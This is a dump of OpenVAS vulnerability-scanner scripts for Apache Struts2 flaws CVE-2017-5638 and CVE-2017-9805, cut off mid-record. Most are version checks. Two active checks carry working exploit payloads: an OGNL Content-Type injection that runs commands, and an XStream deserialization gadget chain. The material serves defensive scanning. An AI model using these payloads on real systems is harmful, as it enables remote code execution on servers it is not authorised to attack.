Test\n# $Id: gb_cisco_cucm_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106647\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucm_version.nasl\");\n script_mandatory_keys(\"cisco/cucm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:52", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310140229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2017-0004.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140229\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n script_name(\"VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Updates are available\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n script_tag(name:\"insight\", value:\"Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"affected\", value:\"vROps 6.2.1, 6.3, 6.4 and 6.5\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 10:25:48 +0200 (Fri, 31 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\", \"vmware/vrealize/operations_manager/build\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( ! build = get_kb_item( \"vmware/vrealize/operations_manager/build\" ) ) exit( 0 );\n\nif( version =~ \"^6\\.3\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.3.0 Build 5263486';\n\nif( version =~ \"^6\\.2\\.1\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.2.1 Build 5263486';\n\nif( version =~ \"^6\\.4\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.4.0 Build 5263486';\n\nif( version =~ \"^6\\.5\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.5.0 Build 5263486';\n\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version + ' Build ' + build, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "description": "Cisco ISE is prone to a vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-13T00:00:00", "type": "openvas", "title": "Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_ise_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:identity_services_engine\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106640\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco ISE is prone to a vulnerability in Apache Struts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-13 11:35:28 +0700 (Mon, 13 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ise_version.nasl\");\n script_mandatory_keys(\"cisco_ise/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\naffected = make_list('1.3.0.876',\n '1.4.0.253',\n '2.0.0.306',\n '2.2.0.470',\n '2.0.1.130',\n '2.1.0.474',\n '2.2.0.471');\n\nforeach af (affected) {\n if (version == af) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-26T15:41:09", "description": "Apache Struts is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "openvas", "title": "Apache Struts Remote Code Execution Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-25T00:00:00", "id": "OPENVAS:1361412562310140180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts Remote Code Execution Vulnerability (Active Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140180\");\n script_version(\"2020-06-25T07:01:49+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-25 07:01:49 +0000 (Thu, 25 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 12:19:09 +0100 (Wed, 08 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_name(\"Apache Struts Remote Code Execution Vulnerability (Active Check)\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"gb_vmware_vcenter_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute arbitrary\n code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP POST request.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for\n more information.\");\n\n script_tag(name:\"summary\", value:\"Apache Struts is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port( default:80 );\nhost = http_host_name( dont_add_port:TRUE );\n\nurls = make_list( );\n\nforeach ext( make_list( \"action\", \"do\", \"jsp\" ) ) {\n exts = http_get_kb_file_extensions( port:port, host:host, ext:ext );\n if( exts && is_array( exts ) ) {\n urls = make_list( urls, exts );\n }\n}\n\nif( get_kb_item( \"VMware_vCenter/installed\" ) )\n urls = make_list( \"/statsreport/\", urls );\n\ncmds = exploit_commands();\n\nx = 0;\n\nvt_strings = get_vt_strings();\n\nforeach url ( urls )\n{\n bound = vt_strings[\"default_rand\"];\n\n data = '--' + bound + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"' + vt_strings[\"default\"] + '\"; filename=\"' + vt_strings[\"default\"] + '.txt\"\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n vt_strings[\"default\"] + '\\r\\n' +\n '\\r\\n' +\n '--' + bound + '--';\n\n foreach cmd ( keys( cmds ) )\n {\n c = \"{'\" + cmds[ cmd ] + \"'}\";\n\n ex = \"%{(#\" + vt_strings[\"default\"] + \"='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):\" +\n \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.\" +\n \"opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().\" +\n \"clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder(\" + c + \")).\" +\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" +\n \"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\";\n\n req = http_post_put_req( port:port, url:url, data:data, add_headers:make_array( \"Content-Type:\", ex ) );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:cmd, string:buf ) )\n {\n report = 'It was possible to execute the command `' + cmds[ cmd ] + '` on the remote host.\\n\\nRequest:\\n\\n' + req + '\\n\\nResponse:\\n\\n' + buf;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n if( x > 25 ) break;\n}\n\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:33", "description": "Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310106646", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106646", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucmim_cisco-sa-20170310-struts2.nasl 13999 2019-03-05 13:15:01Z cfischer $\n#\n# Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106646\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 13999 $\");\n\n script_name(\"Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 14:15:01 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucmim_version.nasl\");\n script_mandatory_keys(\"cisco/cucmim/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-08T18:48:38", "description": "This host is running Apache Struts and is\n prone to remote code execution vulnerability.", "cvss3": {}, "published": "2017-09-07T00:00:00", "type": "openvas", "title": "Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9805"], "modified": "2020-05-06T00:00:00", "id": "OPENVAS:1361412562310811730", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811730", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811730\");\n script_version(\"2020-05-06T06:57:16+0000\");\n script_cve_id(\"CVE-2017-9805\");\n script_bugtraq_id(100609);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 06:57:16 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-07 16:39:09 +0530 (Thu, 07 Sep 2017)\");\n script_name(\"Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-052.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request and check\n whether we are able to execute arbitrary code or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within the REST plugin which\n is using a XStreamHandler with an instance of XStream for deserialization\n without any type filtering.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow\n an attacker to execute arbitrary code in the context of the affected application.\n Failed exploit attempts will likely result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.5 through 2.5.12,\n 2.1.2 through 2.3.33.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.5.13\n or 2.3.34 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port(default:8080);\nhost = http_host_name(dont_add_port:TRUE);\n\nforeach ext(make_list(\"action\", \"do\", \"jsp\")){\n exts = http_get_kb_file_extensions(port:port, host:host, ext:ext);\n if(exts && is_array(exts)){\n found = TRUE;\n break;\n }\n}\n\nif( ! found )\n exit( 0 );\n\nhost = http_host_name(port:port);\nsoc = open_sock_tcp(port);\nif(!soc)\n exit(0);\n\nif(host_runs(\"Windows\") == \"yes\"){\n COMMAND = '<string>ping</string><string>-n</string><string>3</string><string>' + this_host() + '</string>';\n win = TRUE;\n}else{\n ##For Linux and Unix platform\n vtstrings = get_vt_strings();\n check = vtstring[\"ping_string\"];\n pattern = hexstr(check);\n COMMAND = '<string>ping</string><string>-c</string><string>3</string><string>-p</string><string>' + pattern + '</string><string>' + this_host() + '</string>';\n}\n\ndata =\n' <map>\n <entry>\n <jdk.nashorn.internal.objects.NativeString>\n <flags>0</flags>\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n <dataHandler>\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n <is class=\"javax.crypto.CipherInputStream\">\n <cipher class=\"javax.crypto.NullCipher\">\n <initialized>false</initialized>\n <opmode>0</opmode>\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"java.util.Collections$EmptyIterator\"/>\n <next class=\"java.lang.ProcessBuilder\">\n <command>\n ' + COMMAND + '\n </command>\n <redirectErrorStream>false</redirectErrorStream>\n </next>\n </iter>\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n <method>\n <class>java.lang.ProcessBuilder</class>\n <name>start</name>\n <parameter-types/>\n </method>\n <name>foo</name>\n </filter>\n <next class=\"string\">foo</next>\n </serviceIterator>\n <lock/>\n </cipher>\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n <ibuffer/>\n <done>false</done>\n <ostart>0</ostart>\n <ofinish>0</ofinish>\n <closed>false</closed>\n </is>\n <consumed>false</consumed>\n </dataSource>\n <transferFlavors/>\n </dataHandler>\n <dataLen>0</dataLen>\n </value>\n </jdk.nashorn.internal.objects.NativeString>\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n <entry>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n </map>';\nlen = strlen(data);\nurl = '/struts2-rest-showcase/orders/3';\nreq = http_post_put_req( port: port,\n url: url,\n data: data,\n add_headers: make_array( 'Content-Type', 'application/xml'));\n\nres = send_capture( socket:soc,\n data:req,\n timeout:2,\n pcap_filter: string( \"icmp and icmp[0] = 8 and dst host \", this_host(), \" and src host \", get_host_ip() ) );\nclose(soc);\n\nif(res && (win || check >< res)){\n report = \"It was possible to execute command remotely at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + \" with the command '\" + COMMAND + \"'.\";\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-09T17:43:22", "description": "Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108771", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108771\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n 